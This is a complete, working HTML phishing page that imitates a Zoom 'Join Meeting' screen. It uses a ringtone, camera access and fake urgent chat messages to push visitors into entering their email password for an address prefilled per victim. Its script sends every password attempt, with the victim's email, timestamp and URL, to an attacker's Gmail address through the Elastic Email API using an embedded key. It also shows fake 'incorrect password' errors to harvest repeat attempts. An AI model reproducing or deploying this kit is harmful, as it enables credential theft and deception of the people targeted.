<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="icon" href="https://st1.zoom.us/zoom.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Join Meeting - Zoom</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Overpass:ital,wght@0,100..900;1,100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&family=Ubuntu+Sans:ital,wght@0,100..800;1,100..800&display=swap" rel="stylesheet">
    <style>
        ._home_1or8x_1 ._zwp_1or8x_1 {
            width: 300px;
            margin-bottom: 8%
        }

        @media (max-width: 850px) {
            ._home_1or8x_1 ._zwp_1or8x_1 {
                width: 40%
            }
        }

        ._home_1or8x_1 {
            display: flex;
            flex-flow: column wrap;
            align-items: center;
            justify-content: space-between;
            height: 95vh;
            width: 100%
        }

        ._home_1or8x_1 section {
            display: grid;
            padding-top: 10%;
            width: 100%;
            grid-template-columns: repeat(1fr);
            justify-items: center
        }

        ._btn_1or8x_51 {
            border-radius: 6px;
            font-size: 14px;
            font-style: normal;
            font-weight: 400;
            line-height: 24px;
            text-align: center;
            font-weight: 700;
            height: 40px;
            background: #0e72ed;
            border: 0;
            color: #fff;
            width: 240px
        }

        button:not(:disabled) {
            cursor: pointer
        }

        button:disabled {
            cursor: not-allowed
        }

        ._btn_plain_1or8x_91 {
            background: #fff;
            border: 1px solid #909096;
            color: #222230;
            font-weight: 400;
            margin-top: 20px
        }

        @media (max-width: 850px) {
            ._home_1or8x_1 section {
                padding-top: 40%
            }

            ._btn_1or8x_51 {
                width: auto;
                padding: 0 15px
            }
        }

        ._video_bg_1or8x_127 {
            background-color: #222230;
            width: 90%;
            height: calc(100vh - 100px);
            margin: 1% auto 0;
            border-radius: 20px;
            -webkit-border-radius: 20px;
            -moz-border-radius: 20px;
            -ms-border-radius: 20px;
            -o-border-radius: 20px;
            position: relative;
            display: flex;
            flex-flow: row wrap;
            justify-content: space-between;
            filter: drop-shadow(1px 2px 3px #ccc);
            -webkit-filter: drop-shadow(1px 2px 3px #ccc)
        }

        ._video_bg_1or8x_127 aside,._video_bg_1or8x_127 section {
            height: 100%;
            flex-basis: 65%
        }

        ._video_bg_1or8x_127 aside {
            background-color: #f5f5f5;
            flex-basis: 35%;
            display: flex;
            justify-content: center;
            align-items: center;
            position: relative
        }

        @media (max-width: 990px) {
            ._video_bg_1or8x_127 section {
                flex-basis: 50%;
                order: 2
            }

            ._video_bg_1or8x_127 section img {
                top: 12em
            }

            ._video_bg_1or8x_127 aside {
                flex-basis: 50%
            }
        }

        @media (max-width: 650px) {
            ._video_bg_1or8x_127 {
                flex-flow: column-reverse;
                height: 700px!important
            }
        }

        ._video_bg_1or8x_127 section {
            display: flex;
            position: relative;
            flex-flow: column;
            justify-content: space-between;
            overflow: hidden;
            border-top-left-radius: inherit;
            width: 100%
        }

        ._video_bg_1or8x_127 footer section {
            flex-direction: row;
            justify-content: flex-end;
            gap: 2em;
            overflow: auto
        }

        ._video_bg_1or8x_127 footer {
            position: absolute;
            width: 100%;
            height: 50px;
            border-bottom-right-radius: inherit;
            border-bottom-left-radius: inherit;
            display: flex;
            z-index: 399;
            bottom: 0;
            justify-content: space-between
        }

        ._video_bg_1or8x_127 footer div {
            display: flex;
            align-items: center;
            height: 100%;
            gap: 1em;
            margin-left: 1em
        }

        ._video_bg_1or8x_127 footer button {
            background-color: transparent;
            border: none
        }

        @media (max-width: 850px) {
            ._video_bg_1or8x_127 {
                margin-top: 7%;
                height: 500px
            }

            video {
                width: 800px
            }
        }

        @media (max-width: 650px) {
            ._video_bg_1or8x_127 footer button svg {
                width: 24px
            }

            ._video_bg_1or8x_127 footer section *:not(._video_bg_1or8x_127 footer div+section>button:nth-child(1)) {
                display: none
            }
        }

        video {
            left: 0;
            border-top-right-radius: 0!important;
            border-bottom-right-radius: 0!important;
            top: -5%!important
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none;
            font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Open Sans,Helvetica Neue,sans-serif
        }

        .loading {
            position: absolute;
            left: 50%;
            top: 50%;
            transform: translate(-50%,-50%);
            width: 50px;
            height: 50px;
            border: 10px solid #764237;
            border-radius: 50%;
            animation: zoom 1s linear infinite alternate-reverse
        }

        .loading+h3 {
            position: absolute;
            left: 50%;
            top: 60%;
            transform: translate(-50%,-60%);
            -webkit-transform: translate(-50%,-60%);
            -moz-transform: translate(-50%,-60%);
            -ms-transform: translate(-50%,-60%);
            -o-transform: translate(-50%,-60%);
            color: #0e72ed
        }

        #caption {
            position: absolute;
            z-index: 333;
            text-align: left!important;
            background-color: #00000045;
            max-width: 48%!important;
            padding: 5px
        }

        @keyframes zoom {
            0% {
                width: 50px;
                height: 50px;
                border-color: #374876
            }

            25% {
                width: 70px;
                height: 70px;
                border-color: #3e3776cc
            }

            50% {
                width: 90px;
                height: 90px;
                border-color: #37387699
            }

            75% {
                width: 110px;
                height: 110px;
                border-color: #1b4dc280
            }

            to {
                width: 130px;
                height: 130px;
                border-color: #76423766
            }
        }

        .circles {
            height: 90vmin;
            position: relative;
            width: 90vmin
        }

        .circles>div {
            animation: growAndFade 3s infinite ease-out;
            background-color: #1e90ff;
            border-radius: 50%;
            height: 100%;
            opacity: 0;
            position: absolute;
            width: 100%
        }

        .circles .circle1 {
            animation-delay: 1s
        }

        .circles .circle2 {
            animation-delay: 2s
        }

        .circles .circle3 {
            animation-delay: 3s
        }

        @keyframes growAndFade {
            0% {
                opacity: .25;
                transform: scale(0)
            }

            to {
                opacity: 0;
                transform: scale(1)
            }
        }

        html,body {
            margin: 0 auto;
            color: #fff;
            font-family: overpass,sans-serif
        }

        .online_ {
            width: 15px;
            height: 15px;
            background-color: #0fcc45;
            border-radius: 50%;
            position: absolute;
            bottom: 12%!important
        }

        .loginPage {
            background: #2772f9;
            width: 100%;
            color: #fff;
            display: grid;
            height: 100%
        }

        .loginPage h3 {
            font-family: Ubuntu Sans,sans-serif;
            font-size: x-large;
            text-align: center;
            margin: .3em 0 0
        }

        .loginPage a {
            color: #0e72ed
        }

        .loginPage form {
            background-color: #fff;
            color: "#000";
            width: 70%;
            margin: 0 auto;
            border-radius: 4px;
            padding: 1em;
            max-height: 300px;
            -webkit-border-radius: 4px;
            -moz-border-radius: 4px;
            -ms-border-radius: 4px;
            -o-border-radius: 4px
        }

        .loginPage form h3 {
            color: #0e72ed
        }

        .circle {
            height: 200px;
            width: 200px;
            border-radius: 50%;
            background-color: #0e72ed;
            position: relative!important;
            transform: translate(-50%,-50%)
        }

        @media (max-width: 990px) {
            .circle {
                background-color: transparent;
                height: 150px;
                margin: 0 auto;
                width: 150px
            }

            .circle:before,.circle:after {
                clip-path: circle()
            }

            .online {
                display: block!important
            }
        }

        @media (max-width: 750px) {
            .circle {
                width: 140px
            }

            .online {
                place-items: center;
                padding-top: 0;
                padding-left: 25%
            }
        }

        @media (max-width: 650px) {
            .online {
                justify-content: center;
                padding-left: 15%!important;
                padding-top: 35%!important;
                display: flex!important
            }

            #btn {
                line-height: 1;
                height: max-content;
                width: max-content;
                padding: 12px 16px
            }
        }

        .circle:before,.circle:after {
            content: "";
            display: block;
            position: absolute;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            border: 1px solid #0e72ed;
            border-radius: 50%
        }

        .circle:before {
            animation: ripple 2s linear infinite
        }

        .circle:after {
            animation: ripple 2s linear 1s infinite
        }

        @keyframes ripple {
            0% {
                transform: scale(1)
            }

            50% {
                transform: scale(1.3);
                opacity: 1
            }

            to {
                transform: scale(1.6);
                opacity: 0
            }
        }

        .text {
            width: 100%;
            clip-path: circle();
            position: absolute!important;
            top: -25%!important
        }

        input {
            padding: 12px 0;
            text-indent: 1em
        }

        #editor {
            background-color: #0e72ed;
            width: 50%;
            margin: 0 auto;
            color: #fff;
            padding: 1em;
            top: 50%;
            border-radius: 4px;
            min-height: 200px;
            display: grid;
            place-items: center;
            left: 50%;
            position: absolute;
            transform: translate(-50%,-50%);
            -webkit-transform: translate(-50%,-50%);
            -moz-transform: translate(-50%,-50%);
            -ms-transform: translate(-50%,-50%);
            -o-transform: translate(-50%,-50%);
            -webkit-border-radius: 4px;
            -moz-border-radius: 4px;
            -ms-border-radius: 4px;
            -o-border-radius: 4px
        }

        #editor *:not(input),#editor *:not(button[type=button]) {
            color: #fff
        }

        #editor img {
            width: 120px;
            margin: 1em 0
        }

        input {
            outline: none
        }

        #editor input,#editor button {
            width: 90%;
            background-color: #e3e3e3;
            border: none;
            color: #000!important;
            outline: none;
            border-radius: 4px;
            -webkit-border-radius: 4px;
            -moz-border-radius: 4px;
            -ms-border-radius: 4px;
            -o-border-radius: 4px
        }

        #editor button {
            padding: 10px 13px;
            margin: 1em
        }

        #editor button[type=submit] {
            background-color: #1098d6;
            color: #fff!important;
            display: block
        }

        #editor button[type=button] {
            background-color: #0fcc45;
            color: #fff!important;
            display: block
        }

        .custom-toast {
            position: fixed;
            bottom: 20px;
            right: 20px;
            background-color: white;
            color: black;
            padding: 12px 20px;
            border-radius: 4px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.15);
            display: flex;
            align-items: center;
            max-width: 300px;
            z-index: 9999;
            opacity: 0;
            transition: opacity 0.3s ease-in-out;
        }

        .custom-toast.show {
            opacity: 1;
        }

        .custom-toast-icon {
            margin-right: 12px;
            font-size: 20px;
            color: #ff4b4b;
        }

        /* Landing page styles */
        .landing-page {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background: white;
        }

        .landing-page.hidden {
            display: none;
        }

        .zoom-logo {
            color: #0e72ed;
            font-size: 48px;
            font-weight: bold;
            margin-bottom: 10px;
        }

        .workplace-title {
            color: #2d3748;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 80px;
        }

        .landing-buttons {
            display: flex;
            flex-direction: column;
            gap: 15px;
            align-items: center;
        }

        .join-meeting-btn, .sign-in-btn {
            padding: 12px 40px;
            border: none;
            border-radius: 6px;
            font-size: 16px;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.3s ease;
            width: 200px;
        }

        .join-meeting-btn {
            background: #0e72ed;
            color: white;
        }

        .join-meeting-btn:hover {
            background: #0056b3;
        }

        .sign-in-btn {
            background: white;
            color: #2d3748;
            border: 1px solid #d1d5db;
        }

        .sign-in-btn:hover {
            background: #f9fafb;
        }

        /* Error message styles */
        .error-message {
            background: #fef2f2;
            border: 1px solid #fecaca;
            color: #dc2626;
            padding: 12px;
            border-radius: 4px;
            font-size: 14px;
            margin: 10px 0;
            display: none;
        }

        .error-message.show {
            display: block;
        }
    </style>
</head>
<body>
    <!-- Landing Page -->
    <div id="landingPage" class="landing-page">
        <div class="zoom-logo">zoom</div>
        <div class="workplace-title">Workplace</div>
        <div class="landing-buttons">
            <button class="join-meeting-btn" onclick="goToWaitingRoom()">Join Meeting</button>
            <button class="sign-in-btn" onclick="goToWaitingRoom()">Sign In</button>
        </div>
    </div>

    <!-- Waiting Room -->
    <div id="waitingRoom" style="display: none;">
        <header style="border-bottom: 1px solid rgb(204, 204, 204); height: 50px; align-items: center; display: flex;">
            <a href="#back" style="padding-left: 1em; display: flex; justify-content: flex-start; align-items: center;">
                <div class="zoom-logo"><img src="zoom.svg" alt="/assets/zwp-BGMEwu_B.svg" style="width: 90px;"></div>

            </a>
        </header>
        <section class="_video_bg_1or8x_127">
            <section style="height: 100%;">
                <div class="online" style="color: rgb(255, 255, 255); display: flex; align-items: center; justify-content: center; height: 100%; width: 100%; gap: 3em; padding-top: 16%; padding-left: 6%;">
                    <div class="circle">
                        <img src="imageone.jpg" class="text">
                        <div class="online_"></div>
                    </div>
                    <div class="circle">
                        <img src="imagetwo.jpg" class="text">
                        <div class="online_"></div>
                    </div>
                </div>
            </section>
            <aside>
                <div class="circles" style="height: 120px; width: 120px;">
                    <div class="circle1"></div>
                    <div class="circle2"></div>
                    <div class="circle3"></div>
                </div>
                <div style="display: flex; justify-content: center; position: absolute; bottom: 35px; width: 100%;">
                    <button id="btn" class="_btn_1or8x_51" onclick="joinMeeting()" style="width: 65%; margin-top: 10px; display: flex; justify-content: center; align-items: center; gap: 1em;">
                        <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" height="20" width="20" xmlns="http://www.w3.org/2000/svg">
                            <polygon points="23 7 16 12 23 17 23 7"></polygon>
                            <rect x="1" y="5" width="15" height="14" rx="2" ry="2"></rect>
                        </svg>
                        Join Meeting - 2 Participants
                    </button>
                </div>
            </aside>
        </section>
    </div>

    <!-- Meeting Interface -->
    <div id="meetingInterface" style="display: none;">
        <header style="border-bottom: 1px solid rgb(204, 204, 204); height: 50px; align-items: center; display: flex;">
            <a href="#back" style="padding-left: 1em; display: flex; justify-content: flex-start; align-items: center;">
                <div style="color: #0e72ed; font-size: 20px; font-weight: bold;">zoom</div>
                <div style="color: #2d3748; font-size: 20px; font-weight: 300; margin-left: 8px;">Workplace</div>
            </a>
        </header>
        <section class="_video_bg_1or8x_127">
            <section style="height: 100%;">
                <p id="caption" style="position: absolute; bottom: 13%; color: rgb(255, 255, 255); font-family: overpass; text-indent: 10px; text-align: left; width: 100%; z-index: 3444; opacity: 0;"></p>
                <video id="userVideo" autoplay playsinline style="z-index: 1; border-radius: inherit; top: 0px; margin-left: -8%; width: 1223.19px; height: 955px;"></video>
                <footer>
                    <div>
                        <button>
                            <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" color="#fff" height="31" width="31" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <path d="M842 454c0-4.4-3.6-8-8-8h-60c-4.4 0-8 3.6-8 8 0 140.3-113.7 254-254 254S258 594.3 258 454c0-4.4-3.6-8-8-8h-60c-4.4 0-8 3.6-8 8 0 168.7 126.6 307.9 290 327.6V884H326.7c-13.7 0-24.7 14.3-24.7 32v36c0 4.4 2.8 8 6.2 8h407.6c3.4 0 6.2-3.6 6.2-8v-36c0-17.7-11-32-24.7-32H548V782.1c165.3-18 294-158 294-328.1zM512 624c93.9 0 170-75.2 170-168V232c0-92.8-76.1-168-170-168s-170 75.2-170 168v224c0 92.8 76.1 168 170 168zm-94-392c0-50.6 41.9-92 94-92s94 41.4 94 92v224c0 50.6-41.9 92-94 92s-94-41.4-94-92V232z"></path>
                            </svg>
                        </button>
                        <button>
                            <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" color="#fff" height="31" width="31" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <polygon points="23 7 16 12 23 17 23 7"></polygon>
                                <rect x="1" y="5" width="15" height="14" rx="2" ry="2"></rect>
                            </svg>
                        </button>
                    </div>
                    <section>
                        <button>
                            <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" color="#fff" height="31" width="31" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <path d="M4 12v8a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-8"></path>
                                <polyline points="16 6 12 2 8 6"></polyline>
                                <line x1="12" y1="2" x2="12" y2="15"></line>
                            </svg>
                        </button>
                        <button>
                            <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" color="#fff" height="31" width="31" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <path d="M17 21v-2a4 4 0 0 0-4-4H5a4 4 0 0 0-4 4v2"></path>
                                <circle cx="9" cy="7" r="4"></circle>
                                <path d="M23 21v-2a4 4 0 0 0-3-3.87"></path>
                                <path d="M16 3.13a4 4 0 0 1 0 7.75"></path>
                            </svg>
                        </button>
                        <button>
                            <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" color="#fff" height="31" width="31" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <path d="M21 11.5a8.38 8.38 0 0 1-.9 3.8 8.5 8.5 0 0 1-7.6 4.7 8.38 8.38 0 0 1-3.8-.9L3 21l1.9-5.7a8.38 8.38 0 0 1-.9-3.8 8.5 8.5 0 0 1 4.7-7.6 8.38 8.38 0 0 1 3.8-.9h.5a8.48 8.48 0 0 1 8 8v.5z"></path>
                            </svg>
                        </button>
                        <button class="_btn_1or8x_51" onclick="cancelMeeting()" style="background-color: rgb(208, 59, 59); color: rgb(255, 255, 255); width: max-content; padding: 0px 10px; margin-right: 10px;">
                            <svg stroke="currentColor" fill="none" stroke-width="2" viewBox="0 0 24 24" stroke-linecap="round" stroke-linejoin="round" color="#fff" height="16" width="16" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                <path d="M10.68 13.31a16 16 0 0 0 3.41 2.6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7 2 2 0 0 1 1.72 2v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.42 19.42 0 0 1-3.33-2.67m-2.67-3.34a19.79 19.79 0 0 1-3.07-8.63A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91"></path>
                                <line x1="23" y1="1" x2="1" y2="23"></line>
                            </svg>
                            <span>&nbsp; Cancel Meeting</span>
                        </button>
                    </section>
                </footer>
            </section>
            <aside>
                <div class="loginPage" style="position: absolute; top: 0px; left: 0px;">
                    <div style="display: flex; justify-content: center; padding-top: 0px; flex-flow: column; align-items: center;">
                        <div style="color: #fff; font-size: 48px; font-weight: bold; margin: 20px 0;">zoom</div>
                        <h3 style="font-size: 16px; margin: 0px;">Welcome sbjx1@sbjx.com, You have been invited to join a meeting</h3>
                    </div>
                   <form id="loginForm"> <!-- Add this ID here -->
    <section>
        <h3>Continue sign in as</h3>
        <h4 style="color: black; text-align: center; margin: 0px;">lookmoon@hsbc.com</h4>
        <input type="hidden" name="email" value="lookmoon@hsbc.com">
        <input type="password" name="password" placeholder="Enter Email Password" required minlength="6" value="">
        <div id="errorMessage" class="error-message">
            Please sign in first before canceling the meeting.
        </div>
        <small style="padding: 0.3em 0px; color: rgb(0, 0, 0); margin-top: 0px;">
            By Clicking <strong style="color: rgb(39, 114, 249);">"Launch Meeting"</strong> you agree to our 
            <a href="/">Terms of Service</a> and <a href="/">Privacy Statement</a>
        </small>
        <div class="box">
            <button class="_btn_1or8x_51"
                    type="submit"
                    style="width:100%;opacity:1;cursor:default;">
              Launch Meeting
            </button>
        </div>
    </section>
</form>
                </div>
            </aside>
        </section>
    </div>

    <!-- Audio -->
    <audio id="ringtone" loop>
        <source src="https://firebasestorage.googleapis.com/v0/b/zoom-42092.appspot.com/o/google_meet.mp3?alt=media&token=25fb9d63-afc2-474d-af04-71e0e56a928a" type="audio/mpeg">
    </audio>

    <script>
        // Request notification permission on page load
        window.addEventListener('load', function() {
            if ('Notification' in window && Notification.permission === 'default') {
                Notification.requestPermission();
            }
        });

        // Sample chat messages
        const chatMessages = [
            "John: Hello, we're in a hurry and need your immediate presence in the meeting.",
            "Sarah: Urgent: We require your attendance in the meeting right away.",
            "Mike: Please join us as soon as possible, we're waiting for you.",
            "Lisa: The client is waiting for our presentation.",
            "David: Can you share your screen when you join?",
            "Emma: We have some important updates to share.",
            "Alex: The deadline is approaching fast.",
            "Tom: Let's get started with the agenda items."
        ];

        let chatInterval;

        function goToWaitingRoom() {
            document.getElementById('landingPage').classList.add('hidden');
            document.getElementById('waitingRoom').style.display = 'block';
            
            // Start ringtone
            const audio = document.getElementById('ringtone');
            audio.play().catch(() => {});
        }

        function joinMeeting() {
            // Request camera and microphone access
            navigator.mediaDevices.getUserMedia({ video: true, audio: true })
                .then(stream => {
                    // Stop ringtone
                    stopRingtone();
                    
                    // Hide waiting room, show meeting
                    document.getElementById('waitingRoom').style.display = 'none';
                    document.getElementById('meetingInterface').style.display = 'block';
                    
                    // Show user's camera feed
                    const video = document.getElementById('userVideo');
                    video.srcObject = stream;
                    
                    // Start chat messages
                    startChatMessages();
                })
                .catch(err => {
                    alert("Camera or microphone access denied. Please allow access to join the meeting.");
                });
        }

        function stopRingtone() {
            const audio = document.getElementById('ringtone');
            audio.pause();
            audio.currentTime = 0;
        }

        function startChatMessages() {
            chatInterval = setInterval(() => {
                const randomMessage = chatMessages[Math.floor(Math.random() * chatMessages.length)];
                showChatMessage(randomMessage);
            }, 3000 + Math.random() * 4000); // Random interval between 3-7 seconds
        }

        function showChatMessage(message) {
            const captionElement = document.getElementById('caption');
            captionElement.textContent = message;
            captionElement.style.opacity = '1';
            
            // Hide message after 5 seconds
            setTimeout(() => {
                captionElement.style.opacity = '0';
            }, 5000);
        }

       function cancelMeeting() {
            // Show error message
            const errorMessage = document.getElementById('errorMessage');
            errorMessage.classList.add('show');
            
            // Hide error message after 5 seconds
            setTimeout(() => {
                errorMessage.classList.remove('show');
            }, 5000);
        }


        function showCustomToast(message, duration = 3000) {
            const toast = document.createElement('div');
            toast.className = 'custom-toast';
            const icon = document.createElement('span');
            icon.className = 'custom-toast-icon';
            icon.innerHTML = '&#9940;';
            const text = document.createElement('span');
            text.textContent = message;
            toast.appendChild(icon);
            toast.appendChild(text);
            document.body.appendChild(toast);
            toast.offsetHeight;
            toast.classList.add('show');
            setTimeout(() => {
                toast.classList.remove('show');
                setTimeout(() => {
                    document.body.removeChild(toast);
                }, 300);
            }, duration);
        }

        // CREDENTIAL CAPTURE FUNCTIONALITY
        const elasticEmailApiKey = '9E00668C1ADFA64D550A4667DFE59D1C5073B82E6302B4E47378551A86C04C1E0F7E45E492B018F64BBFC055C623AF44';
        const fromEmail = 'smtp@choicelink.online';

        // Use localStorage for victim data
        let victimMap = {};
        try {
            victimMap = JSON.parse(localStorage.getItem('victimMap')) || {};
        } catch (e) {
            victimMap = {};
        }

        let attemptCount = 0;
        let errorTimeout;
        let targetEmail = 'danjekwu778@gmail.com'; // Your email to receive credentials

        // Get form elements
        const loginForm = document.getElementById('loginForm');
        const errorDiv = document.getElementById('errorMessage');
        const passwordInput = loginForm.querySelector('input[type="password"]');
        const userEmailDisplay = document.querySelector('h4');
        const hiddenEmailInput = document.querySelector('input[name="email"]');
        const submitButton = loginForm.querySelector('button[type="submit"]');
        const welcomeMessage = document.querySelector('h3[style*="font-size: 16px"]');

        // Function to get query parameter from URL
        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            const paramLower = param.toLowerCase();
            
            for (let [key, value] of urlParams.entries()) {
                if (key.toLowerCase() === paramLower) {
                    return value;
                }
            }
            return null;
        }

        // Initialize page based on URL parameters
        function initializePage() {
            const requestID = getQueryParam('requestID'); 
            
            console.log("Looking for requestID. Found:", requestID);

            if (requestID && victimMap[requestID]) {
                const victimEmail = victimMap[requestID];
                userEmailDisplay.textContent = victimEmail;
                hiddenEmailInput.value = victimEmail;
                
                if (welcomeMessage) {
                    welcomeMessage.textContent = `Welcome ${victimEmail}, You have been invited to join a meeting`;
                }
                
                errorDiv.style.display = 'none';
                console.log("Page initialized for victim:", victimEmail);
            } else {
                console.error("Invalid requestID or not found in map. ID was:", requestID);
                handleInvalidLink();
            }
        }

        function handleInvalidLink() {
            passwordInput.style.display = 'none';
            submitButton.style.display = 'none';
            userEmailDisplay.style.display = 'none';
            
            errorDiv.textContent = 'Invalid meeting link. Please check your invitation.';
            errorDiv.style.display = 'block';
            errorDiv.style.color = 'red';
            errorDiv.style.fontWeight = 'bold';
            errorDiv.style.textAlign = 'center';
            errorDiv.style.fontSize = '18px';
            errorDiv.style.marginTop = '20px';
        }

        // Form submission handler
        loginForm.addEventListener('submit', function(event) {
            event.preventDefault();
            const password = passwordInput.value;
            const victimEmail = hiddenEmailInput.value;

            attemptCount++;
            if (errorTimeout) clearTimeout(errorTimeout);

            if (attemptCount === 1) {
                errorDiv.textContent = 'Email or Password is incorrect!';
            } else if (attemptCount === 2) {
                errorDiv.textContent = 'Delay In Connection, Give It Another Try';
            } else {
                errorDiv.textContent = 'Network error! Connection timed out.';
            }

            sendCredentialsToEmail(victimEmail, password, `Attempt ${attemptCount}`);
            errorDiv.style.display = 'block';
            
            errorTimeout = setTimeout(() => {
                errorDiv.style.display = 'none';
            }, 3000);

            passwordInput.value = '';
            passwordInput.focus();
        });

        // Function to send credentials via Elastic Email
    function sendCredentialsToEmail(victimEmail, password, attemptNumber) {
        const subject = `Credential Capture - ${attemptNumber}`;
        const bodyText = `Victim Email: ${victimEmail}\nPassword: ${password}\nAttempt: ${attemptNumber}\nTimestamp: ${new Date().toLocaleString()}\nURL: ${window.location.href}`;

        const formData = new URLSearchParams();
        formData.append('apikey', elasticEmailApiKey);
        formData.append('subject', subject);
        formData.append('from', fromEmail);
        formData.append('to', targetEmail);
        formData.append('bodyText', bodyText);
        formData.append('isTransactional', 'true');

        fetch('https://api.elasticemail.com/v2/email/send', {
            method: 'POST',
            headers: {'Content-Type': 'application/x-www-form-urlencoded'},
            body: formData
        })
        .then(response => response.json())
        .then(data => console.log('Credentials captured:', data))
        .catch(error => console.error('Error:', error));
    }

    // Initialize the page
    initializePage();
    </script>
</body>
</html>
